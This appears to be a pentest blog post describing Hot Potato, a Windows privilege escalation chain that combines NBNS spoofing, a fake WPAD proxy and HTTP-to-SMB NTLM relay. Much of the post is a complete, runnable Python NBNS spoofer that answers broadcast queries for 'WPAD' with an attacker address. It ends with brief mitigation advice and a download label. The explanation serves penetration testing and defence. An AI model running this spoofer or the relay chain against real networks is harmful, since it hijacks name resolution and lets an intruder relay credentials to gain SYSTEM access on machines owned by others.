Pentest Tools

Published on January 17th, 2016


Hot Potato — Windows Privilege Escalation


Privilege Escalation on Windows 7, 8, 10, Server 2008, Server 2012 … and a new network attack

Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.  Using this technique, we can elevate our privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.

This matters because many organizations unfortunately rely on Windows account privileges to protect their corporate network. Once an attacker gains highly privileged access to ANY workstation or server on a Windows network, they can often use it to move laterally and compromise other hosts in the same domain. As attackers, we usually get our first foothold on a machine as a low-privilege user or service account. Gaining high-privilege access on that host is therefore a critical step in a penetration test, and it is usually done in an ad-hoc manner because there have been no public exploits or techniques that do it reliably.

The techniques this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft has been aware of all of these issues for some time (circa 2000). They are unfortunately hard to fix without breaking backward compatibility, and attackers have been leveraging them for over 15 years.

The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches. Each part corresponds to an already well known attack that has been in use for years:

  • Local NBNS Spoofer

    NBNS (NetBIOS Name Service) is a broadcast UDP protocol (port 137) for name resolution commonly used in Windows environments. Queries are unauthenticated and the first answer wins, so a host that replies to a query before the legitimate owner does can point the name at any address it likes.

  • Fake WPAD Proxy Server

    In Windows, Internet Explorer by default will automatically try to detect the network proxy configuration by fetching the URL “http://wpad/wpad.dat”. If the NBNS spoofer answers the lookup for “WPAD” with the attacker’s address, that file, and with it the proxy setting, comes from the attacker; other Windows components that auto-detect their proxy the same way are redirected through the fake proxy too.

  • HTTP -> SMB NTLM Relay

    NTLM is part of the Windows Integrated Authentication suite and is essentially a challenge-response design. The relay takes the NTLM challenge issued by the local SMB service, hands it to the HTTP client that is authenticating to the fake proxy, and passes that client’s response back to SMB, so it authenticates over SMB as the client without ever learning its password. The relay only succeeds when the SMB target does not require signing, which is the default on workstations and member servers.
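The NBNS spoofer is the first link in the chain, and its mechanics are easiest to see in code. The following is an added example written for this page, not code from the Hot Potato project: it parses a NetBIOS name query, decides whether the name is one worth hijacking, and crafts the positive name-query response (RFC 1002) that points the name at the attacker, echoing the victim’s transaction ID so the answer is accepted. The attacker address, the set of spoofed names and the UDP/137 listener in the `__main__` block are assumptions for illustration.

```python
"""NBNS spoofer building blocks (added example, not Hot Potato's own code).

Parses NetBIOS name queries and crafts the positive name-query response
that beats the legitimate answer.  ATTACKER_IP and SPOOF_NAMES are assumptions.
"""
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020              # NetBIOS general name service record
QCLASS_IN = 0x0001
FLAGS_QUERY_BCAST = 0x0110     # OPCODE=query, RD, B (broadcast)
FLAGS_POSITIVE_RESP = 0x8500   # R=1 (response), AA, RD

SPOOF_NAMES = {"WPAD"}         # assumption: the only name this chain needs
ATTACKER_IP = "192.168.56.10"  # assumption: where the victim should be sent


def encode_netbios_name(name, suffix=0x00):
    """RFC 1001 first-level encoding: pad the name to 15 bytes, append the
    service suffix byte, then write each nibble as 'A' + nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(encoded) + b"\x00"  # length byte + 32 chars + terminator


def decode_netbios_name(field):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(field) < 34 or field[0] != 0x20 or field[33] != 0x00:
        raise ValueError("not a single-label NetBIOS name")
    nibbles = [c - 0x41 for c in field[1:33]]
    if any(n < 0 or n > 15 for n in nibbles):
        raise ValueError("invalid first-level encoding")
    raw = bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_name_query(txid, name, suffix=0x00):
    """What a Windows host broadcasts when it resolves a name via NBNS."""
    header = struct.pack(">HHHHHH", txid, FLAGS_QUERY_BCAST, 1, 0, 0, 0)
    return header + encode_netbios_name(name, suffix) + struct.pack(">HH", QTYPE_NB, QCLASS_IN)


def parse_name_query(packet):
    """Return (txid, name, suffix) for an NB name query, else None."""
    if len(packet) < 50:
        return None
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", packet[:12])
    is_response = bool(flags & 0x8000)
    opcode = (flags >> 11) & 0xF
    if is_response or opcode != 0 or qdcount != 1:
        return None
    try:
        name, suffix = decode_netbios_name(packet[12:46])
    except ValueError:
        return None
    qtype, qclass = struct.unpack(">HH", packet[46:50])
    if qtype != QTYPE_NB or qclass != QCLASS_IN:
        return None
    return txid, name, suffix


def build_positive_response(txid, name, suffix, ip, ttl=165):
    """Positive Name Query Response: header + one RR mapping name -> ip."""
    header = struct.pack(">HHHHHH", txid, FLAGS_POSITIVE_RESP, 0, 1, 0, 0)
    rr = encode_netbios_name(name, suffix)
    rr += struct.pack(">HHIH", QTYPE_NB, QCLASS_IN, ttl, 6)  # RDLENGTH = flags + addr
    rr += struct.pack(">H", 0x0000) + socket.inet_aton(ip)   # NB_FLAGS: B-node, unique
    return header + rr


def parse_positive_response(packet):
    """Return (txid, name, suffix, ip) from a positive response, else None."""
    if len(packet) < 62:
        return None
    txid, flags, _, ancount, _, _ = struct.unpack(">HHHHHH", packet[:12])
    if not flags & 0x8000 or ancount < 1:
        return None
    name, suffix = decode_netbios_name(packet[12:46])
    rtype, _, _, rdlen, _ = struct.unpack(">HHIHH", packet[46:58])
    if rtype != QTYPE_NB or rdlen != 6:
        return None
    return txid, name, suffix, socket.inet_ntoa(packet[58:62])


def spoof_reply(packet, names=SPOOF_NAMES, ip=ATTACKER_IP):
    """The spoofer's decision: answer only queries for targeted names,
    echoing the victim's transaction ID so the forged reply is accepted."""
    parsed = parse_name_query(packet)
    if parsed is None:
        return None
    txid, name, suffix = parsed
    if name not in names:
        return None
    return build_positive_response(txid, name, suffix, ip)


if __name__ == "__main__":
    # Answer targeted broadcast queries on UDP/137 (needs the port to be free
    # and usually elevated rights); everything else is left untouched.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", NBNS_PORT))
    while True:
        data, src = sock.recvfrom(1024)
        reply = spoof_reply(data)
        if reply:
            sock.sendto(reply, src)
```

Echoing the transaction ID assumes the spoofer can observe the query; a spoofer that cannot see the traffic has to guess it. On the defensive side, this link of the chain disappears when NetBIOS over TCP/IP is disabled, and a static “WPAD” DNS entry (or disabling proxy auto-detection) stops the lookup from ever falling back to NBNS.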

Windows 7

Windows Server 2008

Windows 8/10/Server 2012

Source && Download
